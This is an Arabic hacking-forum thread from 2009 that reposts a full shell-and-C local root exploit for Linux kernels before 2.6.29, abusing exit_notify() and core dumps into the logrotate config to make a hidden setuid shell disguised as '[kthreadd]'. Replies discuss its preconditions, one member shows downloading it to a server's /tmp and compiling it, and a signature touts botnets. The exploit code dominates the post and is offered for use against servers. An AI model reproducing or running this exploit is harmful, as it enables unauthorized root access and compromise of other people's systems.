العودة   صقور الهكرز > Th3 H1dd3n W0r1D - العالم المخفي عالم الهكرز > اختراق المواقع والسيرفرات > Local / Remote ROOT Exploits


Linux kernel <2.6.29 exit_notify() local root exploit

Just For Local And Remote Root Exploits
فقط للوكلات والريموتات الجديدة والقديمة .. يوجد هنا اصدار الكرنل مع اللوكال رووت الخاص بها - ثغرات اللوكال رووت واستثماراتها


إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
رقم المشاركة : ( 1 )
HACKERS PAL غير متواجد حالياً
الصورة الرمزية HACKERS PAL
 
HACKERS PAL
 ||!! ..Secure MinD.. !!||
الأوسمـة
بيانات الإتصال
آخر المواضيع
 
رقم العضوية : 1
تاريخ التسجيل : Mar 2004
مكان الإقامة : :: فلسـ قلب ـطين ::
عدد المشاركات : 5,753 [+]
آخر تواجد : منذ 14 ساعات [+]
عدد النقاط : 0
قوة الترشيح :
افتراضي

كُتب : [ 04-11-2009 ] الموضوع الأصلي : [ هنا ]

كود:
 #!/bin/sh

################################################################################
###
# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit**************
# 
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 
# so you'll be out of luck most of the time. 
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to 
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
################################################################################
####




SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include <unistd.h>
#include <sys/types.h>

int main()
{
****setuid(0);
****execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include <stdio.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

int child(void *data)
{
****sleep(2);
****printf("I'm gonna kill the suidroot father without having root rights :D\n");
****execl("/usr/bin/gpasswd","%s",NULL);
****exit(0);
}

int main()
{
****int stacksize = 4*getpagesize();
****void *stack, *stacktop;
****stack = malloc(stacksize);
****stacktop = stack + stacksize;
****chdir("/etc/logrotate.d");
****int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
****if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]
المصدر
http://www.milw0rm.com/exploits/8369

The Palestinian HaCkeR



رد مع اقتباس
Alkindiii غير متواجد حالياً
 رقم المشاركة : ( 2 )
Alkindiii
Administrator
رقم العضوية : 115266
تاريخ التسجيل : Jan 2009
مكان الإقامة : المغرب
عدد المشاركات : 356 [+]
آخر تواجد : منذ أسبوع واحد [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 04-11-2009 ]

شكرا لك أخي HACKERS PAL

كإضافة لتطبيق هذا اللوكل روت يجب أن تكون قيمة /proc/sys/fs/suid_dumpable محددة في 1 أو 2.

وهذه القيمة لا يمكن تبديلها إذا لم يكن لديك روت وغالبا ما تكون هذه القيمة 0 (default value) يعني يجب أن يكون لديك بعض الحظ لتجدها غير ذلك في السيرفر وتطبق هذا اللوكل.

<div class='quotetop'>إقتباس</div>
Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
so you'll be out of luck most of the time.
So it is not going to be the script kiddies' new killer shit :-)[/b]


تحياتي.

بروكسي سريع لتصفح المواقع المحجوبة :
www.ffsurf.net


رد مع اقتباس
HACKERS PAL غير متواجد حالياً
 رقم المشاركة : ( 3 )
HACKERS PAL
 ||!! ..Secure MinD.. !!||
رقم العضوية : 1
تاريخ التسجيل : Mar 2004
مكان الإقامة : :: فلسـ قلب ـطين ::
عدد المشاركات : 5,753 [+]
آخر تواجد : منذ 14 ساعات [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 04-11-2009 ]

يعطيك العافية اخي على ردك وتوضيحك

لكن كمان في برامج وادوات عشان تتثبت على النظام بتتطلب انها هاد القيمة تكون 1 او 2

هي افتراضيا off .. لكن نسبة كبيرة من السيرفرات بتغيرها

سلام

The Palestinian HaCkeR



رد مع اقتباس
nightboss2007 غير متواجد حالياً
 رقم المشاركة : ( 4 )
nightboss2007
صقر جديد
رقم العضوية : 96584
تاريخ التسجيل : Oct 2008
مكان الإقامة : libya-benghazi
عدد المشاركات : 12 [+]
آخر تواجد : 04-25-2010 [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 04-18-2009 ]

الله يفتح عليكم انتوا اثنين ويعطيكم العافيه

رد مع اقتباس
!~¤§¦..M4ST3R..¦§¤~! غير متواجد حالياً
 رقم المشاركة : ( 5 )
!~¤§¦..M4ST3R..¦§¤~!
SQ-ROOT
رقم العضوية : 108099
تاريخ التسجيل : Dec 2008
مكان الإقامة : فلـــــســـ لاجئ ــــطيـني U.A.E
عدد المشاركات : 5,600 [+]
آخر تواجد : منذ أسبوع واحد [+]
عدد النقاط : 500
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 05-04-2009 ]

ما نفع اللوكا روت معي مع ان اصدار الكرنل

كود:
2.6.9-42.0.10
يعني كما قلت اخي

<div class='quotetop'>إقتباس</div>
وكال رووت للكرنل 2.6.29 وما اقل[/b]
ملاحظه انا الي سويته اني نسخت الكود وحطيته بتكست وحفظته بامتداد c وضغتطه zip ورفعته برابط مباشر وسحبته على مجلد /tmp بس لما ترجمته اعطاني اخطاء للصبح



سلام

رد مع اقتباس
!~¤§¦..M4ST3R..¦§¤~! غير متواجد حالياً
 رقم المشاركة : ( 6 )
!~¤§¦..M4ST3R..¦§¤~!
SQ-ROOT
رقم العضوية : 108099
تاريخ التسجيل : Dec 2008
مكان الإقامة : فلـــــســـ لاجئ ــــطيـني U.A.E
عدد المشاركات : 5,600 [+]
آخر تواجد : منذ أسبوع واحد [+]
عدد النقاط : 500
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 05-04-2009 ]

وهذه الاخطاء

كود:
wget http://www.arbup.org/m1/amer1.zip
--01:55:18--**http://www.arbup.org/m1/amer1.zip
********** => `amer1.zip'
Resolving www.arbup.org... 66.96.133.24
Connecting to www.arbup.org|66.96.133.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,581 (1.5K) [application/zip]

****0K .

01:55:18 (57.99 MB/s) - `amer1.zip' saved [1581/1581]

unzip amer1.zip
Archive:**amer1.zip
replace amer.c? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
**inflating: amer.c
chmod 777 amer.c
gcc amer.c -o amer
amer.c:1:2: invalid preprocessing directive #!
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:4: error: syntax error at '##' token
amer.c:4: error: syntax error at '#' token
amer.c:5:3: invalid preprocessing directive #gw
amer.c:7:3: invalid preprocessing directive #by
amer.c:9:3: invalid preprocessing directive #Based
amer.c:10:3: invalid preprocessing directive #Basically
amer.c:11:3: invalid preprocessing directive #parent
amer.c:12:3: invalid preprocessing directive #already
amer.c:13:3: invalid preprocessing directive #in
amer.c:15:3: invalid preprocessing directive #!
amer.c:16:3: invalid preprocessing directive #Needs
amer.c:17:3: invalid preprocessing directive #so
amer.c:18:3: invalid preprocessing directive #So
amer.c:19:3: invalid preprocessing directive #!
amer.c:21:10: missing binary operator before token "invent"
amer.c:105:27: warning: no newline at end of file
amer.c:21:1: unterminated #if
سلام

رد مع اقتباس
Br4v3-H4cK3r غير متواجد حالياً
 رقم المشاركة : ( 7 )
Br4v3-H4cK3r
0M@R
رقم العضوية : 118413
تاريخ التسجيل : Feb 2009
مكان الإقامة : Kingdom Of Saudi Arabia
عدد المشاركات : 3,503 [+]
آخر تواجد : منذ 55 دقيقة [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 05-05-2009 ]

شكرا لك اخي العزيز

في امان الله

طارق راح تبقى صقر من صقور الهكرز ومن اشراف صقور الهكرز

لا احد يتطوع ليعلم أحد ، بينما الجميع هنا متطوع لافادة من يريد الاستفادة

][ تم دخول عالم الـ BoTNeT والفضل بعد الله لأخي الحبيب Xx0vV الذي افادني فجزاه الله خير ][
][قريبا سأضع لكم أقوى BoT بإذن الرحمن سبحانه وتعالى][

TH3 Tr4nSl4t0R By SoQoR T34M

Br4v3_CrYpTeR By SoQoR T34M

رد مع اقتباس
technico غير متواجد حالياً
 رقم المشاركة : ( 8 )
technico
صقر نشيط
رقم العضوية : 112360
تاريخ التسجيل : Dec 2008
مكان الإقامة :
عدد المشاركات : 24 [+]
آخر تواجد : 06-21-2009 [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 06-20-2009 ]

شكرا يا امرااااال
وجزاك الله خير

في امان الله

رد مع اقتباس
naf-vb غير متواجد حالياً
 رقم المشاركة : ( 9 )
naf-vb
صقر نشيط
رقم العضوية : 133770
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 24 [+]
آخر تواجد : 07-06-2009 [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 07-05-2009 ]

يعطيك العافية اخي على ردك وتوضيحك

رد مع اقتباس
saidinho2000 غير متواجد حالياً
 رقم المشاركة : ( 10 )
saidinho2000
صقر جديد
رقم العضوية : 124729
تاريخ التسجيل : Apr 2009
مكان الإقامة :
عدد المشاركات : 19 [+]
آخر تواجد : 09-20-2009 [+]
عدد النقاط : 0
قوة الترشيح :
الأوسمـة
بيانات الإتصال
آخر المواضيع
افتراضي

كُتب : [ 07-07-2009 ]

thanks a lott

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
<, exitnotify, exploit, kernel, linux, local, root

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Local Root Exploit for (2.4.21) HACKERS PAL Local / Remote ROOT Exploits 15 منذ 2 أسابيع 10:46 AM
* Linux 2.6.17 - 2.6.24.1 Local Root Exploit HACKERS PAL Local / Remote ROOT Exploits 10 09-11-2009 08:20 PM
Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit some one Local / Remote ROOT Exploits 6 06-10-2009 06:26 AM
Linux 2.6.23 - 2.6.24 Local Root Exploit HACKERS PAL Local / Remote ROOT Exploits 4 11-10-2008 09:36 PM
Local root exploit for (<= 2.4.25) HACKERS PAL Local / Remote ROOT Exploits 11 10-03-2008 04:10 PM

  روابط   وصلات مهمة   أنتقالات سريعة  
  اتصل بنا   نعسان   التسجيل  
  رئيسية المنتدى ضع موقعك هنا تفعيل حسابك  
  مشاهدة طاقم الإدارة ضع موقعك هنا طلب كود التفعيل  
  اجعل جميع المنتديات مقروءة ضع موقعك هنا طلب كلمة المرور  
  الأرشيف ضع موقعك هنا قريبا.
Powered by vBulletin® Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.

Mr7a Tube - Mr7a Finder ! - تويكسات - استضافة وخدمات مواقع - بروكسي تصفح المواقع المحجوبة - رفع ملفات - Xwarz - مرحا - نعسان - Arabian BB - اختصار روابط
free counters
 
 
[حجم الصفحة الأصلي: 150.40 كيلو بايت... الحجم بعد الضغط 150.40 كيلو بايت... تم توفير 0.00 كيلو بايت...بمعدل (0.00%)]